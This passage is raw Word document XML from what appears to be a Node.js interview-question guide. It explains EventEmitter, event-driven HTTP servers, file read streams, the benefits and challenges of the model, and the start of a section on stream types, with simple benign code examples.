        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Many core Node.js modules (like http, fs, and net) are built on EventEmitter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B8A876"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Example of Event-Driven Programming Using EventEmitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21999C63"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EventEmitter = require('events');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D114C85"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BB159E4"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Create an instance of EventEmitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD255EC"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eventEmitter = new EventEmitter();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29370D43"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4004849A"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Register an event listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085FE9CE"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eventEmitter.on('greet', (name) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62993FDA"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console.log(`Hello, ${name}!`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C337AFE"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E023239"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454D8747"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Emit the event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4B8F13"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eventEmitter.emit('greet', 'Alice');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBCB567" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158800AB" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>eventEmitter.on('greet', ...) registers an event listener for the greet event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8E6834" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="166"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>eventEmitter.emit('greet', 'Alice') emits the greet event, triggering the registered listener, which then prints Hello, Alice!.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4062B0"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Real-World Use Cases in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7016E4EF" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HTTP Servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39598D5A" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Node.js uses an event-driven model to handle HTTP requests. The http module listens for events like request and response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B3568E"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http = require('http');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250C5204"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4B3216B"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server = http.createServer((req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4715E807"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res.statusCode = 200;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E732C6F"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res.setHeader('Content-Type', 'text/plain');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137C7AA4"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res.end('Hello World\n');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297990AA"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7AF8E3E"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4F0BB1C"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server.on('request', (req, res) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0247122B"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console.log(`Request received: ${req.url}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B90ABCC"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81BA972"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8406064"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server.listen(3000, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BEBE69"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console.log('Server running at http://localhost:3000/');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089B9312"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365D39C" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>File System Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0473D8C0" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Node.js handles file operations asynchronously, emitting events when reading or writing to files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B7536F"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1508B17A"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098D5B62"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readStream = fs.createReadStream('file.txt');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF76BB6"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44EBE5EE"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readStream.on('data', (chunk) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E0B9DF"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console.log(`Received ${chunk.length} bytes of data.`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504774C1"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056FAA9"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03DB0A7A"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readStream.on('end', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052D9F13"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console.log('Finished reading file.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423C4A95"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E061630"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A8E0407"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readStream.on('error', (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653D8384"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console.error('An error occurred:', err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EB4C47" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF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4D9F3CA" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Real-Time Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686A8ED5" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="167"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>WebSocket-based applications, chat applications, and real-time dashboards heavily rely on event-driven programming. Events such as message, connect, and disconnect are central to these applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF6645C"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Benefits of Event-Driven Programming in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3974F53D" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Non-Blocking I/O:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Node.js handles I/O operations asynchronously, which allows it to process other tasks while waiting for operations like database queries or file reads to complete.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F0FA81" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>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 xml:space="preserve"> The event-driven model is highly scalable because it efficiently manages large numbers of concurrent connections or requests with minimal resource usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C6FC6E" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="168"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Simplicity in Handling Events:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using EventEmitter simplifies the management of events and callbacks, making code easier to write and maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCEF26E" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Challenges and Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37376A83" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Callback Hell:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deeply nested callbacks can make code difficult to read and maintain. This can be mitigated using Promises, async/await, or modularizing the code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FDE380" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Error Handling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Since errors are often handled asynchronously, careful attention is needed to propagate and handle errors properly in callbacks and promises.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0DA362" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Understanding the Event Loop:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> The event loop is crucial to how Node.js works, and misunderstanding its operation can lead to issues like blocking the loop, causing performance bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0FAFC3" w14:textId="77777777" w:rsidR="00C04DF2" w:rsidRPr="00DA2F32" w:rsidRDefault="00C04DF2" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1ABA83"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24" w:name="_Toc178383207"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q23. How do you handle errors in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="7F72154B"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25" w:name="_Toc178383208"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q24. How do you create a server in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="56A7D90D"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26" w:name="_Toc178383209"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q25. How do you read and write files in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="003EBCD7"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27" w:name="_Toc178383210"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q26. What are streams in Node.js?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="76E3DFB4" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In Node.js, streams are a powerful and efficient way to handle data that is being read from or written to a source in a continuous flow, rather than all at once. Streams can be particularly useful for dealing with large amounts of data, such as files or network responses, where it’s impractical to load everything into memory at once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F09F4F4" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Types of Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C06F228" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Readable Streams:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Used for reading data from a source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1184C73E" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: fs.createReadStream() for reading files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDC5FC7" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Events:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A532F5B" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>data: Emitted when a chunk of data is available to read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644C9CA2" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>end: Emitted when there’s no more data to read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A21E650" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>error: Emitted when an error occurs during the reading process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318D87BF" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
